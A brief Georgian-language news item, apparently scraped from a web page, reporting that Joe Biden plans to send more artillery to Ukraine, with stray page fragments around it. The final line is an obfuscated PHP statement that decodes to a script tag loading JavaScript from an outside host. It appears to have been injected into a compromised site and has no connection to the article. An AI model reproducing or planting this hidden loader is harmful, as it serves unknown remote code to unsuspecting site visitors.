celsiusi
ავერსი საქკაბელი
აშშ-ის პრეზიდენტის, ჯო ბაიდენი უკრაინაში მეტი არტილერიის გაგზავნას აპირებს, - ამის შესახებ ინფორმაციას CNN-ი ავრცელებს.
 
როგორც გამოცემა იუწყება, პორტსმუთში, ნიუ-ჰემფშირში ჩასვლისას, ბაიდენს ჟურნალისტებმა ჰკითხეს, აპირებს თუ არა იგი, უკრაინისთვის მეტი არტილერიის მიწოდებას, რაზეც მან უპასუხა, „დიახ".
 
CNN-ი ინფორმაციით, უკრაინაში დახმარების უახლესი, 800 მილიონი დოლარის ღირებულების გადაზიდვები დაიწყო, მათ შორისაა მძიმე ტექნიკა.
 
ცნობისთვის, მედიაში გავრცელებული ინფორმაციით, გამოყოფილი 800 მილიონი დოლარის დახმარების პირველი ნაწილი უკრაინამ რამდენიმე დღის წინ მიიღო. 
 
შეგახსენებთ, რომ მომდევნო საარტილერიო დახმარების შესახებ განცხადება დღეს, თემთა პალატაში სიტყვით გამოსვლისას დიდი ბრიტანეთის პრემიერ-მინისტრმა ბორის ჯონსონმაც გააკეთა.
 
715
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");